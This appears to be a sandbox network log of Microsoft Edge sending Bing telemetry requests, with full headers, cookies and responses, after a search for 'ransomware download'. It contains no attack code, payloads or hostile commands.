GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22Info%22,%22FID%22:%22CI%22,%22Name%22:%22HasRR%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E5AAD98965334AFDA0239FC1D180E750 Ref B: LON04EDGE0811 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b31490a
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22MiniTp%22,%22Text%22:%22show%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22MiniTp%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 95F86347ABE44D62A321663D71885711 Ref B: LON04EDGE0811 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314b4c
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22FullTP%22,%22Text%22:%22show%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.MiniTP%22,%22FID%22:%22CI%22,%22Name%22:%22FullTP%22,%22Text%22:%22show%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7184397431FE4F9B9787777F1F5CBFE0 Ref B: LTSEDGE1508 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314b4b
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.45%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706539%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706540%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A696%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SuperappConnector%22%2C%22CustomData%22%3A%22%7B%5C%22sysMsg%5C%22%3A%5C%22file%20loaded%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22Global%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.Init%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%22Base%22%2C%22FID%22%3A%22CI%22%7D%2C%7B%22Rtt%22%3A%22100%22%2C%22Downlink%22%3A%221.45%22%2C%22T%22%3A%22CI.NetworkPerformance%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%22timinginfo%22%2C%22FID%22%3A%22NetworkPerformanceDetails%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706522%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22EdgeSpoofing%22%7D%2C%7B%22width%22%3A%221280%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706539%2C%22Name%22%3A%22M%22%2C%22FID%22%3A%22BRW%22%7D%2C%7B%22height%22%3A%22609%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706540%2C%22Name%22%3A%22S%22%2C%22FID%22%3A%22BRH%22%7D%2C%7B%22RawDPR%22%3A%221.0%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%221.0%22%2C%22FID%22%3A%22DPR%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%220%22%2C%22FID%22%3A%22DM%22%7D%2C%7B%22T%22%3A%22CI.SCArrST%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A696%2C%22FID%22%3A%22SCArrST%22%7D%2C%7B%22Namespace%22%3A%22SuperappConnector%22%2C%22CustomData%22%3A%22%7B%5C%22sysMsg%5C%22%3A%5C%22file%20loaded%5C%22%7D%22%2C%22T%22%3A%22CI.SystemEvent%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22Global%22%2C%22FID%22%3A%22Codex%22%7D%2C%7B%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22VisibleOrDelayed%22%2C%22FID%22%3A%22BottomBanner%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Info%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22BottomBanner%22%2C%22FID%22%3A%22Mcp%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22bnp.notif.shown%22%2C%22FID%22%3A%2263245%22%7D%2C%7B%22T%22%3A%22CI.BNP%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A%22bnp.embed.ready%22%2C%22FID%22%3A%2263245%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: DD5537F4DE6645F2BEECA91EB3BF482A Ref B: LON04EDGE1110 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314bd6
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2219%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22CharCount%22,%22Text%22:%2219%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 3532E4ACD289407F9A2D24C2A1E85BCA Ref B: LON04EDGE0710 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314bd7
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}]msedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.SERPSB%22,%22FID%22:%22CI%22,%22Name%22:%22LandingRows%22,%22Text%22:%221%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: BAFB6AFDA5E84D21B7D329A287386872 Ref B: LTSEDGE1614 Ref C: 2024-02-29T15:31:49Z
content-length: 0
date: Thu, 29 Feb 2024 15:31:49 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314bd8
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22Time%22%3A1337%2C%22time%22%3A1339%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1709220706893%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.BNPUxAssetIndex%22%2C%22TS%22%3A1709220706541%2C%22Name%22%3A0%2C%22FID%22%3A%22BNP%22%7D%2C%7B%22Time%22%3A1337%2C%22time%22%3A1339%2C%22T%22%3A%22CI.Latency%22%2C%22TS%22%3A1709220706893%2C%22Name%22%3A%22Loaded%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: private
content-encoding: br
vary: Accept-Encoding
x-eventid: 65e0a365871c47aeafbe9e4486cc604e
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy-report-only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-XNmWu75AOuXoLAiT73biIs8SqSIpsa+1mLC7X1ddzKs='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Thu, 29 Feb 2024 15:31:49 GMT
set-cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0&PV=10.0; domain=.bing.com; expires=Tue, 25-Mar-2025 15:31:49 GMT; path=/; secure; SameSite=None
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.98777b5c.1709220709.b314bd9
-
GEThttps://www.bing.com/fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1340%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220706894%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5Dmsedge.exeRemote address:92.123.128.152:443RequestGET /fd/ls/l?IG=92027AEB1C3C42769F3D4EA5938FBAC6&CID=060B31E3593A60702C3D25D75802611A&TYPE=Event.ClientInst&DATA=%5B%7B%22comp%22%3A%22loaded%22%2C%22time%22%3A1340%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1709220706894%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=ransomware+download&cvid=460378d9cd004e0cad14078ef8361c0c&aqs=edge..69i57j0l6.9955j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=060B31E3593A60702C3D25D75802611A
cookie: MUIDB=060B31E3593A60702C3D25D75802611A
cookie: _EDGE_S=F=1&SID=172BBB3C780F696B1A6EAF0879376803
cookie: _EDGE_V=1
cookie: _SS=PC=U531&SID=172BBB3C780F696B1A6EAF0879376803
cookie: SRCHS=PC=U531
cookie: USRLOC=HS=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=2729516C522E41CAACA0E0F9F9299EB1&dmnchg=1
cookie: SRCHUSR=DOB=20240229
cookie: SRCHHPGUSR=SRCHLANG=en&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=4731&DPR=1.0&UTC=0&DM=0
ResponseHTTP/2.0 200
content-type: text/html; charset=utf-8
cache-control: no-cache
content-encoding: br
expires: -1
pragma: no-cache
vary: Accept-Encoding
x-eventid: 65e0a36586c54679907d00e523b507a9
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
